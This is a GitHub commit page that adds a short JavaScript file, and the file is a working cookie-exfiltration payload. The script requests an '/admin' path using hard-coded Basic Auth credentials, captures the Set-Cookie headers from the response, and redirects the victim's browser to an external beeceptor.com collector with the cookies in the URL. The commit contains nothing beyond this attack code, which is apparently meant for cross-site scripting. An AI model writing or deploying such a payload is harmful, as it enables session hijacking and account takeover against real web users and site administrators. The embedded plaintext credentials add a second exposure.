Skip to content

Commit

Permalink
Create fdsfasd432234.js
Browse files Browse the repository at this point in the history
  • Loading branch information
TWTZptr authored Jan 9, 2025
1 parent e6e2610 commit 50ba0e7
Showing 1 changed file with 9 additions and 0 deletions.
9 changes: 9 additions & 0 deletions fdsfasd432234.js
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
(async () => {
let headers = new Headers();
headers.set('Authorization', 'Basic ' + btoa('214646f5-1e6f-4049-a1e9-c0d98bcadda6' + ":" + 'valera_smeni_kredi_4mo'));
fetch('/admin', {headers, redirect: 'manual'}).then(res => {
window.location.replace('https://gvfdgdfgfsfd.free.beeceptor.com?cookie=' + res.headers.getSetCookie());
}).catch(err => {
window.location.replace('https://gvfdgdfgfsfd.free.beeceptor.com?cookie=' + JSON.stringify(err))
});
})()

0 comments on commit 50ba0e7

Please sign in to comment.